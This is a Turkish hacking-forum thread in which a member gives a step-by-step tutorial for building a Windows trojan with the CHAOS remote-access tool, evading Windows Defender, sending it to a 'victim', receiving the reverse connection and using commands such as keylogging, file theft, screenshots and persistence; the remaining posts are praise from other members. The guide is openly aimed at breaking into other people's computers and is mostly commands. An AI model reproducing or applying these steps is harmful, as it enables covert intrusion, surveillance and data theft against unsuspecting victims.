THT DUYURU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

chat
Seçenekler

CHAOS ile Windows Defender'i Atlatma ! // Uchiha-Sasuke

Uchiha-Sasuke - ait Kullanıcı Resmi (Avatar)
Green Team (Deneyimli)
Üyelik tarihi:
07/2016
Nereden:
MSFVenom
Mesajlar:
1.379
Konular:
82
Teşekkür (Etti):
30
Teşekkür (Aldı):
483
Ticaret:
(0) %
10-03-2020 22:57
#1
CHAOS ile Windows Defender'i Atlatma ! // Uchiha-Sasuke
Herkese merhaba TurkHackTeam üyeleri,

Ben Uchiha-Sasuke

Bu konumda CHAOS ile Windows Defender'i atlatmayı göstereceğim.


Konunun İçeriği


• Trojen Hakkında Bilgi
• CHAOS Kurulumu
• CHAOS ile Windows Defender Atlatma





Trojen Hakkında Bilgi

Trojen Nedir ?

Trojen, sızma işlemlerinde sıkça kullanılan kötü amaçlı bir yazılımdır.

Kurbanlara virüsü(trojeni) açtırarak sistemlerine sızmamızı sağlar.

Trojen Neler Yapabilir ?

Kurbanın bilgisayarında bulunan verileri ;

Kod:
Silebilir

Değiştirebilir

Ele geçirebilir

Görebilir
Kurbanın bilgisayarını ;

Kod:
Uzaktan kontrol edebilir

Açık uygulamaları kapatabilir
Ve çok daha fazlasını yapabilir.



CHAOS Kurulumu

Şimdi CHAOS Toolumuzu kuralım.

Bunun için ilk olarak terminalimiz açıp root izni alalım.



Komutumuz ;

Kod:
su
Root iznimizi aldık,

Toolumuzu kurmadan önce çalıştırmak için golang'ı kurmamız lazım.



Komutumuz ;

Kod:
apt install golang git go-dep -y
Komutumuzu yazıp enterleyelim ve kurulum otomatik başlıyacak.

Artık toolumuzu kurmaya geçebiliriz.



Komutumuz ;

Kod:
go get github.com/tiagorlampert/CHAOS
Enterleyip Toolumuzu kuralım.



Bi geri dönüş olmadı ancak hata almadıysanız (resimdeki gibiyse) toolumuz başarılı bi şekilde kurulmuştur.

Şimdi ise toolumuzun kurulduğu dizine gideceğiz.



Komutumuz ;

Kod:
cd ~/go/src/github.com/tiagorlampert/CHAOS
Dizine başarılı bi şekilde gittik.

Şimdi programı çalıştırmadan önce son bir komutumuz kaldı.



Komutumuz ;

Kod:
dep ensure
Deminki gibi bir dönüş olmadıysa başarılı bi şekilde komutumuz uygulandı.

Artık toolumuzu çalıştırabiliriz.



CHAOS ile Windows Defenderi Atlatma

Toolumuzu çalıştırma işlemine geçelim.



Komutumuz ;

Kod:
go run main.go
Enterleyip toolumuzu başlatalım.



Gördüğünüz gibi toolumuz başarılı bi şekilde çalıştı.

Artık gerekli komutları girerek trojenimizi oluşturup dinlemeye alacağız.

Şimdi LHOST, LPORT, FNAME, GENERATE bilgilerini gireceğiz.

Ama ondan önce ip adresimizi öğrenelim.



Komutumuz ;

Kod:
ifconfig
Gördüğünüz gibi 192.168.1.X ip adresimiz bunu unutmayalım.

Şimdi programa geri dönüp gerekenleri dolduralım.



Komutumuz ;

Kod:
lhost=192.168.1.X lport=XXXX fname=denemetrojen generate --windows
LHOST Bölümüne ip adresini LPORT yazan bölüme portu yazın. (Yerel ağ içinse port açmaya gerek yok.)

Ardından enterleyelim.



Gördüğünüz gibi girdiğiniz bilgilerden eminmisiniz gibi birşey sordu.

'y' harfine basıp enterleyelim.

Ardından trojenimiz oluşacak.



Gördüğünüz gibi trojenimizin oluştuğunu bize gösteriyor.

Ve trojenin nerede olduğunu gösteriyor.

Enter tuşuna basıp devam ediyoruz.



Gördüğünüz gibi bizi ilk çalıştırdığımız yerdeki ekrana attı.

Şimdi ise trojeni dinlemeye almamız gerek.

Bunun için ;



Komutumuz ;

Kod:
listen lport=XXXX(port)
Ardından enterleyip dinleme işlememizi başlatıyoruz.



Gördüğünüz gibi dinleme işlemimiz başladı.

Şimdi trojeni kurbana atıp bilgisayarına sızabiliriz.

Dosyanın yerini bilmeyenler için ;



Komutumuz ;

Kod:
cd ~/go/src/github.com/tiagorlampert/CHAOS
ls
ls yaptıktan sonra karşımıza dizinin içinde bulunan dosyalar çıktı.

Build bölümünün içine girelim.



Komutumuz ;

Kod:
cd build
ls
Gördüğünüz gibi şimdide Windows karşımıza çıkıyor bunun içine girelim.



Komutumuz ;

Kod:
cd Windows
ls
Ve gördüğünüz gibi trojenimizin bulunduğu dosya karşımıza çıktı, son olarak bunun içine girelim.



Komutumuz ;

Kod:
cd denemetrojen(oluşturduğunuz trojenin ismi)
ls
Ve gördüğünüz gibi karşımıza denemetrojen.exe / denemetrojen.go çıktı.

Bizim trojenimiz exe ile biten denemetrojen.exe dosyası.

Bunu kurbana yedirelim ve çalıştıralım bakalım kurban bize düşecekmi ?



Gördüğünüz gibi windows'a dosyayı aktardım.



Gerçek zamanlı korumam açık ancak virüs olarak algılamadı

İnanmayan olursa bunada bakabilirler.



Gördüğünüz gibi geçerli bi tehdit bulmadı.

Şimdi dosyayı açalım bakalım kurban bize düşecek mi ?



Trojeni çalıştırdım ve gördüğünüz gibi Connected ! yazarak kurbanın bize düştüğünü gösterdi.

Nasıl bilgisayarı incelerim vs. bakmak isterseniz ;



Komutumuz ;

Kod:
help
Enterleyelim ve karşımıza bissürü komut çıkacak.









Gördüğünüz gibi komutlar karşımıza çıktı.

Örnek olarak ;

Kod:
download 	(Dosyayı indirmemize yarar)
upload 	(Dosyayı Yüklememize yarar)
screenshot 	(Ekran görüntüsü almamıza yarar)
keylogger_start 	(Keylogger'ı başlatır)
keylogger_show 	(Keylogger loglarını gösterir)
persistence_enable 	(Başlangıçta çalışmasını sağlar)
persistence_disable 	(Başlangıçta çalışmasını engeller)
getos 	(OS İsmini gösterir)
lockscreen 	(Ekranı kilitler)
openurl 	(İstediğin iz URL'yi açar)
clear 	(Ekranı Temizler)
back 	(Kurbanın makinesinden geri dönmemize yarar{Başka makinelere bağlanmamıza vs.} )
exit 	(Kurbandan çıkmamıza yarar)
systeminfo (Sistem bilgilerini gösterir)
tasklist (Açık olan programları gösterir)
taskkill (Açık olan programları kapatmamıza yarar)
time (Bilgisayar saatini gösterir)
Bissürü komut var çevirerek hepsine bakabilirsiniz



Bu konumunda burda sonuna gelmiş bulunmaktayım.

Uchiha iyi günler diler




---------------------
"Ölüm, insanın değişmez kaderidir; marifet unutulmamaktır.".

Konu Uchiha-Sasuke tarafından (10-03-2020 23:36 Saat 23:36 ) değiştirilmiştir.
"P4RS - ait Kullanıcı Resmi (Avatar)
Purple Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
19
Mesajlar:
4.772
Konular:
534
Teşekkür (Etti):
1356
Teşekkür (Aldı):
2737
Ticaret:
(0) %
10-03-2020 23:06
#2
Cevap: CHAOS ile Windows Defender'i Atlatma ! // Uchiha-Sasuke
Bu konunda kalite akmış maşallah Ellerine sağlık (:
---------------------



purple-team@turkhackteam.org

Xowly - ait Kullanıcı Resmi (Avatar)
Hunter
Üyelik tarihi:
06/2019
Nereden:
ғ˦
Mesajlar:
568
Konular:
72
Teşekkür (Etti):
528
Teşekkür (Aldı):
329
Ticaret:
(0) %
10-03-2020 23:10
#3
Cevap: CHAOS ile Windows Defender'i Atlatma ! // Uchiha-Sasuke
Ellerine sağlık
---------------------
kanserojen - ait Kullanıcı Resmi (Avatar)
İstihbarat Tim
Üyelik tarihi:
12/2018
Mesajlar:
458
Konular:
61
Teşekkür (Etti):
382
Teşekkür (Aldı):
404
Ticaret:
(0) %
10-03-2020 23:20
#4
Cevap: CHAOS ile Windows Defender'i Atlatma ! // Uchiha-Sasuke
Maşallah
---------------------
𝔦𝔰𝔱𝔦𝔥𝔟𝔞𝔯𝔞𝔱 𝔱𝔦𝔪𝔦
T20
T20 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2016
Mesajlar:
83
Konular:
21
Teşekkür (Etti):
29
Teşekkür (Aldı):
0
Ticaret:
(0) %
10-03-2020 23:29
#5
Cevap: CHAOS ile Windows Defender'i Atlatma ! // Uchiha-Sasuke
Ellerine sağlık.
"Atmaca - ait Kullanıcı Resmi (Avatar)
Kulüpler Genel Sorumlusu
Üyelik tarihi:
12/2017
Nereden:
Seul
Yaş:
15
Mesajlar:
3.532
Konular:
259
Teşekkür (Etti):
540
Teşekkür (Aldı):
717
Ticaret:
(0) %
11-03-2020 08:08
#6
Cevap: CHAOS ile Windows Defender'i Atlatma ! // Uchiha-Sasuke
Ellerine sağlık güzel konu olmuş
---------------------
Uchiha-Sasuke - ait Kullanıcı Resmi (Avatar)
Green Team (Deneyimli)
Üyelik tarihi:
07/2016
Nereden:
MSFVenom
Mesajlar:
1.379
Konular:
82
Teşekkür (Etti):
30
Teşekkür (Aldı):
483
Ticaret:
(0) %
11-03-2020 13:29
#7
Cevap: CHAOS ile Windows Defender'i Atlatma ! // Uchiha-Sasuke
Alıntı:
"P4RS´isimli üyeden Alıntı Mesajı göster
Bu konunda kalite akmış maşallah Ellerine sağlık (:
Çok saolun hocam, çok sevindim bu güzel yorumunuz için

Alıntı:
Xowly´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık
Eyvallah dostum

Alıntı:
kanserojen´isimli üyeden Alıntı Mesajı göster
Maşallah


Alıntı:
T20´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık.
Saolasın

Alıntı:
"Atmaca´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık güzel konu olmuş
Eyvallah dostum
---------------------
"Ölüm, insanın değişmez kaderidir; marifet unutulmamaktır.".

ALcatraz' - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
05/2013
Nereden:
İstanbul
Mesajlar:
4.338
Konular:
1030
Teşekkür (Etti):
979
Teşekkür (Aldı):
1838
Ticaret:
(0) %
11-03-2020 15:25
#8
Cevap: CHAOS ile Windows Defender'i Atlatma ! // Uchiha-Sasuke
Konuyu biraz uzatmışsın sanki, konuyu uzun tutmanın telaşı ile oluşan eğreti bi duruşu var yazının. Emeğine sağlık
Uchiha-Sasuke - ait Kullanıcı Resmi (Avatar)
Green Team (Deneyimli)
Üyelik tarihi:
07/2016
Nereden:
MSFVenom
Mesajlar:
1.379
Konular:
82
Teşekkür (Etti):
30
Teşekkür (Aldı):
483
Ticaret:
(0) %
11-03-2020 21:52
#9
Cevap: CHAOS ile Windows Defender'i Atlatma ! // Uchiha-Sasuke
Alıntı:
ALcatraz'´isimli üyeden Alıntı Mesajı göster
Konuyu biraz uzatmışsın sanki, konuyu uzun tutmanın telaşı ile oluşan eğreti bi duruşu var yazının. Emeğine sağlık
Saolasın
---------------------
"Ölüm, insanın değişmez kaderidir; marifet unutulmamaktır.".

KitsuneinKira - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2018
Nereden:
İstanbul
Yaş:
22
Mesajlar:
4
Konular:
0
Teşekkür (Etti):
1
Teşekkür (Aldı):
1
Ticaret:
(0) %
13-03-2020 01:24
#10
Cevap: CHAOS ile Windows Defender'i Atlatma ! // Uchiha-Sasuke
tek kelime ile mükemmel emeğine sağlık
--------------------- Hepimizin içinde hem aydınlık, hem de karanlık bir yan vardır.
Önemli olan Hangisini seçtiğimizdir.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler